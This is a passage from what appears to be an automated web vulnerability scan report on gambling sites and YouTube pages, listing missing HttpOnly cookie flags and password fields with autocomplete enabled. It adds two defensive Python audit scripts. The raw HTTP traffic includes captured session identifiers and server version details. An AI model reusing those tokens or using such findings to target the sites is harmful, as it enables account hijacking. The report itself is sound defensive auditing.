Cookie: qtrans_cookie_test=qTranslate+Cookie+Test; WinningsSID=mae3p27b7retpgqtu508ctoij2; winnings[vid]=540129; winnings[subdomain]=www; winnings[sessionId]=103122733; winnings[cc]=US;

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
ETag: ""
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.13
Set-Cookie: qtrans_cookie_test=qTranslate+Cookie+Test; path=/; domain=www.winnings.com
Set-Cookie: winnings[subdomain]=www; expires=Wed, 15-Jun-2011 12:35:14 GMT; path=/; domain=.winnings.com
Set-Cookie: winnings[cc]=US; expires=Wed, 15-Jun-2011 12:35:14 GMT; path=/; domain=.winnings.com
X-Pingback: http://winnings.com/xmlrpc.php
Date: Mon, 16 May 2011 12:35:16 GMT
Connection: close
Content-Length: 24845

<!DOCTYPE html>
<html dir="ltr" lang="en-US">
<head>
<meta charset="UTF-8" />

<title>Online Scratch Cards ... Scratch and Win Huge Cash Prizes..| Winnings.com</title>
<link rel="alternate" type
...[SNIP]...

12.374. http://www.winnings.com/site-map

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.winnings.com
Path:   /site-map

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /site-map HTTP/1.1
Host: www.winnings.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: qtrans_cookie_test=qTranslate+Cookie+Test; WinningsSID=mae3p27b7retpgqtu508ctoij2; winnings[vid]=540129; winnings[subdomain]=www; winnings[sessionId]=103122733; winnings[cc]=US;

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
ETag: ""
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.13
Set-Cookie: qtrans_cookie_test=qTranslate+Cookie+Test; path=/; domain=www.winnings.com
Set-Cookie: winnings[subdomain]=www; expires=Wed, 15-Jun-2011 12:35:32 GMT; path=/; domain=.winnings.com
Set-Cookie: winnings[cc]=US; expires=Wed, 15-Jun-2011 12:35:32 GMT; path=/; domain=.winnings.com
X-Pingback: http://winnings.com/xmlrpc.php
Date: Mon, 16 May 2011 12:35:34 GMT
Connection: close
Content-Length: 18713

<!DOCTYPE html>
<html dir="ltr" lang="en-US">
<head>
<meta charset="UTF-8" />
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" />
<title> Site map..| Winnings.com</title>
<link rel="a
...[SNIP]...

12.375. http://www.winnings.com/slots

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.winnings.com
Path:   /slots

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /slots HTTP/1.1
Host: www.winnings.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: qtrans_cookie_test=qTranslate+Cookie+Test; WinningsSID=mae3p27b7retpgqtu508ctoij2; winnings[vid]=540129; winnings[subdomain]=www; winnings[sessionId]=103122733; winnings[cc]=US;

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
ETag: ""
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.13
Set-Cookie: qtrans_cookie_test=qTranslate+Cookie+Test; path=/; domain=www.winnings.com
Set-Cookie: winnings[subdomain]=www; expires=Wed, 15-Jun-2011 12:35:15 GMT; path=/; domain=.winnings.com
Set-Cookie: winnings[cc]=US; expires=Wed, 15-Jun-2011 12:35:15 GMT; path=/; domain=.winnings.com
X-Pingback: http://winnings.com/xmlrpc.php
Date: Mon, 16 May 2011 12:35:17 GMT
Connection: close
Content-Length: 24715

<!DOCTYPE html>
<html dir="ltr" lang="en-US">
<head>
<meta charset="UTF-8" />

<title>Play Online Slots ... Fruit machines, Video slots and more. Win huge cash prizes, playing online slots at Win
...[SNIP]...

12.376. http://www.winnings.com/wp-admin/admin-ajax.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.winnings.com
Path:   /wp-admin/admin-ajax.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /wp-admin/admin-ajax.php HTTP/1.1
Host: www.winnings.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: qtrans_cookie_test=qTranslate+Cookie+Test; WinningsSID=mae3p27b7retpgqtu508ctoij2; winnings[vid]=540129; winnings[subdomain]=www; winnings[sessionId]=103122733; winnings[cc]=US;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Content-Type: text/html
Expires: Sat, 26 Jul 1997 05:00:00 GMT
ETag: ""
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.13
Set-Cookie: qtrans_cookie_test=qTranslate+Cookie+Test; path=/; domain=www.winnings.com
Date: Mon, 16 May 2011 12:35:30 GMT
Connection: close
Content-Length: 2

-1

12.377. http://www.youtube.com/user/CrazyScratchCom

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.youtube.com
Path:   /user/CrazyScratchCom

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /user/CrazyScratchCom HTTP/1.1
Host: www.youtube.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 11:58:44 GMT
Server: Apache
X-Content-Type-Options: nosniff
Set-Cookie: use_hitbox=72c46ff6cbcdb7c5585c36411b6b334edAEAAAAw; path=/; domain=.youtube.com
Set-Cookie: VISITOR_INFO1_LIVE=QJdmZX3XHX0; path=/; domain=.youtube.com; expires=Wed, 11-Jan-2012 11:58:44 GMT
Set-Cookie: GEO=dfb55d2f94c5feeb036cbf6d295ddc27cwsAAAAzVVOtwdbzTdERdA==; path=/; domain=.youtube.com
Expires: Tue, 27 Apr 1971 19:44:06 EST
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Connection: close

<!DOCTYPE html>
<html lang="en" dir="ltr" xmlns:og="http://opengraphprotocol.org/schema/">
<!-- machid: sWkFSZzctYUFHdmpGMkpmS0VXa1VnRXBhekJpVlNscGE1Qk9SUzZoUG5wc3hvU3dmRHVtcUt3 -->
<head>



...[SNIP]...

12.378. http://www.youtube.com/user/PostcodeLottery

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.youtube.com
Path:   /user/PostcodeLottery

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /user/PostcodeLottery HTTP/1.1
Host: www.youtube.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 11:58:44 GMT
Server: Apache
X-Content-Type-Options: nosniff
Set-Cookie: use_hitbox=72c46ff6cbcdb7c5585c36411b6b334edAEAAAAw; path=/; domain=.youtube.com
Set-Cookie: VISITOR_INFO1_LIVE=QPD6waz_a-Y; path=/; domain=.youtube.com; expires=Wed, 11-Jan-2012 11:58:44 GMT
Set-Cookie: GEO=dfb55d2f94c5feeb036cbf6d295ddc27cwsAAAAzVVOtwdbzTdERdA==; path=/; domain=.youtube.com
Expires: Tue, 27 Apr 1971 19:44:06 EST
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Connection: close

<!DOCTYPE html>
<html lang="en" dir="ltr" xmlns:og="http://opengraphprotocol.org/schema/">
<!-- machid: sd1dXU2oteFNMSkZHd0ZhX1FzYkZzMDNQRDJkMTVDSU9HTmxZTk9ITmZXNkRwNGt2blpXSDdB -->
<head>



...[SNIP]...

12.379. http://www.youtube.com/user/primescratchcards1

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.youtube.com
Path:   /user/primescratchcards1

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: use_hitbox, VISITOR_INFO1_LIVE and GEO. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /user/primescratchcards1 HTTP/1.1
Host: www.youtube.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 11:58:46 GMT
Server: Apache
X-Content-Type-Options: nosniff
Set-Cookie: use_hitbox=72c46ff6cbcdb7c5585c36411b6b334edAEAAAAw; path=/; domain=.youtube.com
Set-Cookie: VISITOR_INFO1_LIVE=o7D5C2X2FIw; path=/; domain=.youtube.com; expires=Wed, 11-Jan-2012 11:58:46 GMT
Set-Cookie: GEO=8d3458027bf69c9d59b40211c24404e3cwsAAAAzVVOtwdbzTdERdg==; path=/; domain=.youtube.com
Expires: Tue, 27 Apr 1971 19:44:06 EST
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Connection: close

<!DOCTYPE html>
<html lang="en" dir="ltr" xmlns:og="http://opengraphprotocol.org/schema/">
<!-- machid: sWkFSZzctYUFHdmh6U2NNLTZ0UURUcHA1MXdfYjVEQnNxaTVWdFFmSDE4WmcwTG5va3VETmVn -->
<head>



...[SNIP]...

12.380. http://www.youtube.com/v/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.youtube.com
Path:   /v/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: VISITOR_INFO1_LIVE. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /v/ HTTP/1.1
Host: www.youtube.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Mon, 16 May 2011 11:58:46 GMT
Server: Apache
X-Content-Type-Options: nosniff
Set-Cookie: VISITOR_INFO1_LIVE=VtM0_rUoIeg; path=/; domain=.youtube.com; expires=Wed, 11-Jan-2012 11:58:46 GMT
Expires: Tue, 27 Apr 1971 19:44:06 EST
Cache-Control: no-cache
Content-Length: 0
Content-Type: text/html; charset=utf-8
Connection: close

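The HttpOnly findings above are produced by reading the Set-Cookie headers of each response and noting which cookies lack the flag. The following Python script is an added example, not part of the original report or of the scanner, that performs that check over two of the responses quoted on this page (the YouTube response from 12.378 and the bet365 response from 13.2, embedded here as constructed sample input). The SESSION_HINTS list is an assumption made for this example: it marks cookie names that usually carry session state, so that the manual review the report asks for starts with the cookies that matter most.

```python
"""Audit Set-Cookie headers for the HttpOnly flag, the way the report's
section 12 does (added example; not part of the original report)."""
from dataclasses import dataclass
from typing import Dict, List, Tuple

# Cookie-name fragments that usually indicate session state. This is a
# heuristic chosen for the example, not a rule from the scanner.
SESSION_HINTS = ("session", "sess", "sid", "token", "auth")

# Constructed sample: the YouTube response headers from issue 12.378 above.
YOUTUBE_RESPONSE = """HTTP/1.1 200 OK
Date: Mon, 16 May 2011 11:58:44 GMT
Server: Apache
X-Content-Type-Options: nosniff
Set-Cookie: use_hitbox=72c46ff6cbcdb7c5585c36411b6b334edAEAAAAw; path=/; domain=.youtube.com
Set-Cookie: VISITOR_INFO1_LIVE=QPD6waz_a-Y; path=/; domain=.youtube.com; expires=Wed, 11-Jan-2012 11:58:44 GMT
Set-Cookie: GEO=dfb55d2f94c5feeb036cbf6d295ddc27cwsAAAAzVVOtwdbzTdERdA==; path=/; domain=.youtube.com
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8

<!DOCTYPE html>
"""

# Constructed sample: the bet365 response headers from issue 13.2 above.
BET365_RESPONSE = """HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:35:26 GMT
Set-Cookie: ASP.NET_SessionId=uhx0t5ntbzbisd55vri2jy55; path=/; HttpOnly
Set-Cookie: bet365_Session=; path=/
Set-Cookie: stk=FE57C4F4DDFF44EDB9007B44EEA8BA12000002; path=/
Set-Cookie: session=stk=FE57C4F4DDFF44EDB9007B44EEA8BA12000002; path=/
Set-Cookie: lng=en-GB; expires=Tue, 15-May-2012 12:35:26 GMT; path=/
Set-Cookie: country=198; expires=Tue, 15-May-2012 12:35:26 GMT; path=/
Set-Cookie: LandingVisited=True; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8

"""


@dataclass
class CookieFinding:
    name: str
    httponly: bool
    secure: bool
    session_like: bool  # name matches SESSION_HINTS; needs manual review


def set_cookie_headers(raw_response: str) -> List[str]:
    """Return the value of every Set-Cookie header in a raw HTTP response."""
    head = raw_response.split("\n\n", 1)[0]
    values = []
    for line in head.splitlines():
        # Only the first colon separates header name from value, so the
        # colons inside an expires= date do not disturb the split.
        name, sep, value = line.partition(":")
        if sep and name.strip().lower() == "set-cookie":
            values.append(value.strip())
    return values


def parse_set_cookie(value: str) -> Tuple[str, str, Dict[str, str]]:
    """Split 'name=value; attr; attr=val' into (name, value, {attr: val}).

    Only the first '=' separates name from value, so a cookie such as
    session=stk=... keeps its whole value. Attribute names are lower-cased;
    flag attributes (HttpOnly, Secure) map to an empty string.
    """
    pieces = [p.strip() for p in value.split(";")]
    name, _, cookie_value = pieces[0].partition("=")
    attrs: Dict[str, str] = {}
    for piece in pieces[1:]:
        if not piece:
            continue
        key, _, val = piece.partition("=")
        attrs[key.strip().lower()] = val.strip()
    return name.strip(), cookie_value, attrs


def audit_cookies(raw_response: str) -> List[CookieFinding]:
    """One finding per Set-Cookie header, in the order the server sent them."""
    findings = []
    for header in set_cookie_headers(raw_response):
        name, _, attrs = parse_set_cookie(header)
        findings.append(CookieFinding(
            name=name,
            httponly="httponly" in attrs,
            secure="secure" in attrs,
            session_like=any(h in name.lower() for h in SESSION_HINTS),
        ))
    return findings


def missing_httponly(raw_response: str) -> List[str]:
    """Names of cookies set without HttpOnly: the list section 12 reports."""
    return [f.name for f in audit_cookies(raw_response) if not f.httponly]


def review_candidates(raw_response: str) -> List[str]:
    """Cookies that lack HttpOnly and look like session state; review these
    by hand before treating the finding as informational."""
    return [f.name for f in audit_cookies(raw_response)
            if not f.httponly and f.session_like]


if __name__ == "__main__":
    for label, resp in (("youtube", YOUTUBE_RESPONSE), ("bet365", BET365_RESPONSE)):
        print(label, "no HttpOnly:", missing_httponly(resp))
        print(label, "review first:", review_candidates(resp))
```

For the YouTube response the script lists use_hitbox, VISITOR_INFO1_LIVE and GEO, none of which look like session state, which matches the "Information" severity above. For the bet365 response it lists every cookie except ASP.NET_SessionId, and singles out bet365_Session and session for review: whether those actually carry session state is not something the headers alone can settle, which is exactly why the report tells you to check the cookies' function.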

13. Password field with autocomplete enabled
There are 166 instances of this issue:

Issue background

Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.

The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.

Issue remediation

To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields). An attribute on an INPUT takes precedence over the one on its FORM. Note that the attribute is advisory only: credential storage is controlled by the browser, not the application, and current versions of the major browsers deliberately ignore autocomplete="off" on login and password fields so that their built-in password managers keep working. Treat it as defence in depth for shared or kiosk machines, not as a control that prevents credentials from being stored.
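The check behind every instance in this section is simple: walk the HTML, remember the enclosing FORM's action and autocomplete attribute, and flag each type="password" INPUT whose effective autocomplete value (the INPUT's own attribute first, the FORM's as fallback) is anything other than "off". The Python script below is an added example, not the scanner's code, that implements it with the standard library and runs it over the two form fragments quoted in 13.1 and 13.3, plus three hypothetical variants written for this example (FORM_LEVEL_OFF, INPUT_LEVEL_OFF and INPUT_OVERRIDES_FORM, with a made-up /login action) to show how the precedence rule decides what is reported.

```python
"""Find password fields whose effective autocomplete setting is not "off",
the check behind the report's issue 13 (added example, not the scanner's code)."""
from html.parser import HTMLParser
from typing import List, Optional, Tuple

# Constructed samples. The first two are the form fragments quoted in
# issues 13.1 and 13.3 of the report; the remaining three are hypothetical
# variants written for this example to show FORM/INPUT precedence.
INTERWETTEN_FORM = """
<form name="aspnetForm" method="post" action="Default.aspx" id="aspnetForm">
<div>
<input name="ctl00$txtPassword" type="password" id="ctl00_txtPassword" class="field" style="width:169px;" />
<input type="submit" name="ctl00$Button1" value="Login" id="ctl00_Button1" class="button1" />
</div>
</form>
"""

BETSSON_FORM = """
<form action="#fallback-url-for-non-javascript-clients" method="post">
<fieldset>
<input type="password" value="" name="tbPassword" id="tbPassword" tabindex="2" onkeydown="if(event.keyCode==13){doLogin();return false;}"/>
</fieldset>
</form>
"""

# Hypothetical: autocomplete="off" on the FORM covers every field in it.
FORM_LEVEL_OFF = """
<form action="/login" method="post" autocomplete="off">
<input type="text" name="user" />
<input type="password" name="pw" />
</form>
"""

# Hypothetical: only the password INPUT is protected, which is enough.
INPUT_LEVEL_OFF = """
<form action="/login" method="post">
<input type="text" name="user" />
<input type="password" name="pw" autocomplete="off" />
</form>
"""

# Hypothetical: the INPUT attribute wins over the FORM, so this is flagged.
INPUT_OVERRIDES_FORM = """
<form action="/login" method="post" autocomplete="off">
<input type="password" name="pw" autocomplete="on" />
</form>
"""


class PasswordAutocompleteAuditor(HTMLParser):
    """Collect (form action, field name) for every password input whose
    effective autocomplete value is anything other than "off"."""

    def __init__(self) -> None:
        super().__init__()
        self.form_action: Optional[str] = None
        self.form_autocomplete: Optional[str] = None
        self.findings: List[Tuple[str, str]] = []

    def handle_starttag(self, tag: str, attrs) -> None:
        # HTMLParser lower-cases tag and attribute names; a bare attribute
        # (no value) arrives as None, which we treat as an empty string.
        a = {k: (v or "") for k, v in attrs}
        if tag == "form":
            self.form_action = a.get("action", "")
            self.form_autocomplete = a.get("autocomplete")
        elif tag == "input" and a.get("type", "text").lower() == "password":
            # INPUT attribute first; fall back to the enclosing FORM's value.
            effective = a.get("autocomplete", self.form_autocomplete)
            if (effective or "").strip().lower() != "off":
                self.findings.append((self.form_action or "", a.get("name", "")))

    def handle_endtag(self, tag: str) -> None:
        if tag == "form":
            self.form_action = None
            self.form_autocomplete = None


def password_fields_with_autocomplete(html: str) -> List[Tuple[str, str]]:
    """Return the (action URL, field name) pairs the report lists per page."""
    auditor = PasswordAutocompleteAuditor()
    auditor.feed(html)
    auditor.close()
    return auditor.findings


if __name__ == "__main__":
    for label, page in (("interwetten", INTERWETTEN_FORM), ("betsson", BETSSON_FORM),
                        ("form-off", FORM_LEVEL_OFF), ("input-off", INPUT_LEVEL_OFF),
                        ("input-on", INPUT_OVERRIDES_FORM)):
        print(label, password_fields_with_autocomplete(page))
```

The two real fragments each yield one finding, with the same action URL and field name the report's issue detail gives; the two hardened variants yield none; the last variant is still reported because the INPUT's autocomplete="on" overrides the FORM. The audit only tells you what the markup asks of the browser, so pair it with the caveat above about browsers ignoring the attribute.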


13.1. http://affiliates.interwetten.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://affiliates.interwetten.com
Path:   /

Issue detail

The page contains a form with the following action URL: Default.aspx. The form contains the following password field with autocomplete enabled: ctl00$txtPassword.

Request

GET / HTTP/1.1
Host: affiliates.interwetten.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:20:09 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=4rvtrm45hxdjs5axh0krts45; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 10237
Set-Cookie: BIGipServerPool_affiliates.interwetten.com=1727730092.20480.0000; path=/
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta ht
...[SNIP]...
<body>
<form name="aspnetForm" method="post" action="Default.aspx" id="aspnetForm">
<div>
...[SNIP]...
</label>
<input name="ctl00$txtPassword" type="password" id="ctl00_txtPassword" class="field" style="width:169px;" />

<input type="submit" name="ctl00$Button1" value="Login" id="ctl00_Button1" class="button1" />
...[SNIP]...

13.2. http://bingo.bet365.com/play/en/home/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://bingo.bet365.com
Path:   /play/en/home/

Issue detail

The page contains a form with the following action URL: /play/en/home/Default.aspx. The form contains the following password field with autocomplete enabled: ctl00$HeaderPlaceHolder$HeaderControl$Login$ProtectedPassword.

Request

GET /play/en/home/ HTTP/1.1
Host: bingo.bet365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:35:26 GMT
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=uhx0t5ntbzbisd55vri2jy55; path=/; HttpOnly
Set-Cookie: bet365_Session=; path=/
Set-Cookie: stk=FE57C4F4DDFF44EDB9007B44EEA8BA12000002; path=/
Set-Cookie: session=stk=FE57C4F4DDFF44EDB9007B44EEA8BA12000002; path=/
Set-Cookie: lng=en-GB; expires=Tue, 15-May-2012 12:35:26 GMT; path=/
Set-Cookie: country=198; expires=Tue, 15-May-2012 12:35:26 GMT; path=/
Set-Cookie: LandingVisited=True; path=/
Cache-Control: private
Expires: Sat, 14 May 2011 12:35:26 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 130943


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   Bingo at bet36
...[SNIP]...
<div id="pageContainer" style="float:none;">
<form name="aspnetForm" method="post" action="/play/en/home/Default.aspx" onkeypress="javascript:return WebForm_FireDefaultButton(event, 'ctl00_HeaderPlaceHolder_HeaderControl_Login_Go')" id="aspnetForm">
<div>
...[SNIP]...
ssword&quot;, 2);" OnFocus="PasswordBehaviour(&quot;ctl00_HeaderPlaceHolder_HeaderControl_Login_ProtectedPassword&quot;, &quot;ctl00_HeaderPlaceHolder_HeaderControl_Login_InitialPassword&quot;, 2);" /><input name="ctl00$HeaderPlaceHolder$HeaderControl$Login$ProtectedPassword" type="password" id="ctl00_HeaderPlaceHolder_HeaderControl_Login_ProtectedPassword" tabindex="3" OnBlur="PasswordBehaviour(&quot;ctl00_HeaderPlaceHolder_HeaderControl_Login_ProtectedPassword&quot;, &quot;ctl00_HeaderPlaceHolder_HeaderControl_Login_InitialPassword&quot;, 1);" />

<a onclick="if (CreateLoginProcess('', '%2fplay%2fen%2fhome%2f', '', false, this.id)) { SetHiddenPassword(&quot;ctl00_HeaderPlaceHolder_HeaderControl_Login_ProtectedPassword&quot;); return true
...[SNIP]...

13.3. https://bingo.betsson.com/en/

Summary

Severity:   Low
Confidence:   Certain
Host:   https://bingo.betsson.com
Path:   /en/

Issue detail

The page contains a form with the following action URL: #fallback-url-for-non-javascript-clients. The form contains the following password field with autocomplete enabled: tbPassword.

Request

GET /en/ HTTP/1.1
Host: bingo.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:58:51 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:58:51 GMT; path=/
Set-Cookie: ASP.NET_SessionId=bjkl3qyxamknq4451yotmo55; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:58:51 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:58:51 GMT; path=/
Set-Cookie: ASP.NET_SessionId=bjkl3qyxamknq4451yotmo55; path=/; HttpOnly
Set-Cookie: currentSite=1; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:58:51 GMT
Connection: close
Content-Length: 63913


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
<div id="login-form">
           <form action="#fallback-url-for-non-javascript-clients" method="post">
               <fieldset>
...[SNIP]...
</label>
                       <input type="password" value="" name="tbPassword" id="tbPassword" tabindex="2" onkeydown="if(event.keyCode==13){doLogin();return false;}"/>
                       <span class="cl">
...[SNIP]...

13.4. http://casino.bet365.com/extra/en/online-games/baccarat

Summary

Severity:   Low
Confidence:   Certain
Host:   http://casino.bet365.com
Path:   /extra/en/online-games/baccarat

Issue detail

The page contains a form with the following action URL: /extra/en/online-games/baccarat/Default.aspx. The form contains the following password field with autocomplete enabled: ctl00$HeaderPlaceHolder$HeaderControl$Login$ProtectedPassword.

Request

GET /extra/en/online-games/baccarat HTTP/1.1
Host: casino.bet365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:32:25 GMT
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=cbmjzc45ptk3gqmomxrqk1mx; path=/; HttpOnly
Set-Cookie: bet365_Session=; path=/
Set-Cookie: stk=738A9FB42BA343DABCD3136AA3621ACE000002; path=/
Set-Cookie: session=stk=738A9FB42BA343DABCD3136AA3621ACE000002; path=/
Set-Cookie: lng=en-GB; expires=Tue, 15-May-2012 12:32:25 GMT; path=/
Set-Cookie: country=198; expires=Tue, 15-May-2012 12:32:25 GMT; path=/
Cache-Control: private
Expires: Sat, 14 May 2011 12:32:25 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 88186


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_Html" xmlns="http://www.w3.org/1999/xhtml">
<head id="
...[SNIP]...
<div id="pageContainer" style="float:none;">
<form name="aspnetForm" method="post" action="/extra/en/online-games/baccarat/Default.aspx" onkeypress="javascript:return WebForm_FireDefaultButton(event, 'ctl00_HeaderPlaceHolder_HeaderControl_Login_Go')" id="aspnetForm">
<div>
...[SNIP]...
ssword&quot;, 2);" OnFocus="PasswordBehaviour(&quot;ctl00_HeaderPlaceHolder_HeaderControl_Login_ProtectedPassword&quot;, &quot;ctl00_HeaderPlaceHolder_HeaderControl_Login_InitialPassword&quot;, 2);" /><input name="ctl00$HeaderPlaceHolder$HeaderControl$Login$ProtectedPassword" type="password" id="ctl00_HeaderPlaceHolder_HeaderControl_Login_ProtectedPassword" tabindex="3" class="textbox" OnBlur="PasswordBehaviour(&quot;ctl00_HeaderPlaceHolder_HeaderControl_Login_ProtectedPassword&quot;, &quot;ctl00_HeaderPlaceHolder_HeaderControl_Login_InitialPassword&quot;, 1);" /></div>
...[SNIP]...

13.5. http://casino.bet365.com/extra/en/online-games/blackjack

Summary

Severity:   Low
Confidence:   Certain
Host:   http://casino.bet365.com
Path:   /extra/en/online-games/blackjack

Issue detail

The page contains a form with the following action URL: /extra/en/online-games/blackjack/Default.aspx. The form contains the following password field with autocomplete enabled: ctl00$HeaderPlaceHolder$HeaderControl$Login$ProtectedPassword.

Request

GET /extra/en/online-games/blackjack HTTP/1.1
Host: casino.bet365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:32:24 GMT
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=oltt0c55lt0sebb3qyxf2u45; path=/; HttpOnly
Set-Cookie: bet365_Session=; path=/
Set-Cookie: stk=A71662CB8A884A4A9D4A3B4BA20AEE87000002; path=/
Set-Cookie: session=stk=A71662CB8A884A4A9D4A3B4BA20AEE87000002; path=/
Set-Cookie: lng=en-GB; expires=Tue, 15-May-2012 12:32:23 GMT; path=/
Set-Cookie: country=198; expires=Tue, 15-May-2012 12:32:23 GMT; path=/
Cache-Control: private
Expires: Sat, 14 May 2011 12:32:24 GMT
Content-Type: text/html; charset=utf-8
